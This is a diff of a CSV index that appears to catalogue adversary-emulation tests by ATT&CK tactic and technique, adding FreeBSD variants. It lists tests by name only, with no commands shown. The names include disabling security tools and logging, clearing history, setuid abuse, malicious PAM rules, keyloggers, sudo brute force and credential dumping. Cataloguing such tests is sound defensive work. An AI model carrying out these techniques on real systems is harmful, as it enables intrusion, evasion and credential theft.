+defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
+defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
+defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,10,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Auditing Configuration Changes on FreeBSD Host,cedaf7e7-28ee-42ab-ba13-456abd35d1bd,sh
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
+defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configuration Changes on FreeBSD Host,6b8ca3ab-5980-4321-80c3-bcd77c8daed8,sh
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
@@ -91,8 +124,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagg
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
+defense-evasion,T1027,Obfuscated Files or Information,2,Decode base64 Data into Script,197ed693-08e6-4958-bfd8-5974e291be6c,sh
 defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
+defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on FreeBSD,f4568003-1438-44ab-a234-b3252ea7e7a3,sh
 defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
 defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,sh
 defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,sh
@@ -101,27 +136,38 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a si
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
 defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
+defense-evasion,T1036.006,Masquerading: Space after Filename,3,Space After Filename (FreeBSD),cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
+persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
 persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
 persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
 persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
+persistence,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
 persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
+persistence,T1136.001,Create Account: Local Account,2,Create a user account on a FreeBSD system,a39ee1bc-b8c1-4331-8e5f-1859eb408518,sh
 persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
+persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
 persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
 persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
@@ -131,20 +177,29 @@ persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level t
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
+persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
+persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh
 persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
 persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
+persistence,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
+command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
 command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
+command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
 command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
 command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
@@ -162,31 +217,44 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compress
 collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
+collection,T1113,Screen Capture,4,X Windows Capture (freebsd),562f3bc2-74e8-46c5-95c7-0e01f9ccc65c,sh
 collection,T1113,Screen Capture,5,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
+collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freebsd),18397d87-38aa-4443-a098-8a48a8ca5d8d,sh
 collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
 collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
 collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
 collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
+privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
+privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
+privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
+privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
 privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
+privilege-escalation,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
 privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
+privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
+privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
+privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
@@ -197,31 +265,45 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a use
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
+privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
 privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
+privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh
 privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
 privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
+privilege-escalation,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
+credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
 credential-access,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
 credential-access,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 credential-access,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
 credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
+credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with sh on FreeBSD (Local),fa37b633-e097-4415-b2b8-c5bf4c86e423,sh
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,4,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
+credential-access,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
+credential-access,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
